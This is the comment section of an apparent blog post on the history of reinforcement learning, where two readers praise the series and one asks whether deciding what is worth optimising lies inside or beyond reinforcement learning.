Discussion about this post

User's avatar
James Maconochie's avatar

Part 3 is an excellent piece of intellectual history; the framing of the schism as a question of compatibility with the substrate rather than elegance is the part I'll keep. "Survived contact" is exactly right.

What struck me most is your closing turn: the field's first three decades asked how to learn what to optimize, and Part 4 turns to what's worth measuring in the first place. I'd gently suggest that's not a harder version of the same question; it's a different kind of question. Everything from REINFORCE to PPO, RLHF included, takes the objective as given and gets better at pursuing it. Deciding what's worth wanting is the one move that can't be folded into the reward, because there's no outer reward to optimize it against. Curious whether Part 4 treats that as a frontier still inside RL, or as the edge of what RL is.

Sharon Chou's avatar

Nice history and review of reinforcement learning, showing how the problem space affects which algorithms work when.

No posts

Ready for more?